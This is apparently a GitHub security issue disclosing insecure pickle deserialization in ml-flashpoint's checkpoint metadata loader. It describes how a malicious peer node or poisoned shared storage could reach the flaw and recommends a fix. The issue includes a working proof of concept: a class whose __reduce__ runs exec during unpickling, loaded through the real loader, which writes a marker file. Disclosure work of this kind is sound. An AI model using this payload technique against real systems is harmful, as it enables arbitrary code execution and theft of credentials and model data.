Skip to content

[Security Vulnerability] Insecure Pickle Deserialization in Checkpoint Metadata Loading ml-flashpoint #74

@hayageek

Description

@hayageek

Summary

DefaultMLFlashpointCheckpointLoader.read_metadata() in src/ml_flashpoint/core/checkpoint_loader.py uses pickle.load() to deserialize .metadata files from checkpoint directories. These files can originate from untrusted peer nodes in a distributed training cluster (via ReplicationManager.sync_bulk_retrieve) or from shared storage. An attacker who controls a peer node or can write to shared checkpoint storage can craft a malicious pickle payload that achieves arbitrary code execution on any node that loads the checkpoint metadata.

Description

  • Type: Insecure Deserialization (CWE-502)
  • Source: .metadata files read from Path(checkpoint_id.data) / object_name (line 152). In distributed deployments, these files arrive via sync_bulk_retrieve from peer nodes over the network, or from shared filesystem storage accessible to multiple nodes.
  • Sink: pickle.load(f) at lines 154-155 of checkpoint_loader.py. No validation, allowlisting, or sandboxing is applied to the deserialized data.
  • Impact: Arbitrary code execution with the privileges of the ML training process. An attacker can exfiltrate model weights, training data, credentials, or pivot to other systems in the cluster. In multi-tenant or federated training scenarios, a single compromised or malicious participant can compromise all other nodes.

Attack Vectors

  1. Malicious peer node: In a distributed training cluster, _try_retrieve_object_if_missing() calls sync_bulk_retrieve() to fetch checkpoint objects from peer nodes. A compromised peer can serve a crafted .metadata pickle payload. When any other node calls read_metadata() (triggered by _compute_retrieval_plan() or get_latest_complete_checkpoint()), the malicious pickle executes arbitrary code.

  2. Shared storage poisoning: In shared-storage deployments, an attacker with write access to the checkpoint directory can replace or inject a malicious .metadata file. Any node loading that checkpoint will execute the payload.

Affected

  • Package: ml-flashpoint (pip)
  • Repository: google/ml-flashpoint
  • File: src/ml_flashpoint/core/checkpoint_loader.py
  • Function: DefaultMLFlashpointCheckpointLoader.read_metadata() (lines 147-158)
  • Versions: All versions (as of commit on main branch)

References

PoC

A proof-of-concept demonstrates arbitrary code execution by crafting a malicious .metadata pickle file that writes a marker file when deserialized.

payload.py — generates a malicious .metadata file using pickle.dump() with a class that overrides __reduce__ to execute arbitrary code:

import os
import pickle

POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
METADATA_FILE = os.path.join(CHECKPOINT_DIR, ".metadata")


class MaliciousPayload:
    def __reduce__(self):
        return (exec, ("open('pwned.txt','w').write('pwned')",))


def generate():
    os.makedirs(CHECKPOINT_DIR, exist_ok=True)
    with open(METADATA_FILE, "wb") as f:
        pickle.dump(MaliciousPayload(), f)
    return METADATA_FILE

exploit.py — invokes the real DefaultMLFlashpointCheckpointLoader.read_metadata() from the built ml-flashpoint package:

import os
import sys

POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
sys.path.insert(0, POC_DIR)

import payload
from ml_flashpoint.core.checkpoint_id_types import CheckpointContainerId
from ml_flashpoint.core.checkpoint_loader import DefaultMLFlashpointCheckpointLoader

if os.path.exists("pwned.txt"):
    os.remove("pwned.txt")

payload.generate()
loader = DefaultMLFlashpointCheckpointLoader(None, None)
loader.read_metadata(CheckpointContainerId(CHECKPOINT_DIR), ".metadata")

if os.path.exists("pwned.txt"):
    print("EXPLOIT_SUCCESS:", open("pwned.txt").read())
else:
    sys.exit(1)

Running the exploit creates pwned.txt, proving arbitrary code execution via pickle.load() in read_metadata().

Remediation

Replace pickle.load() with a safe deserialization method.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions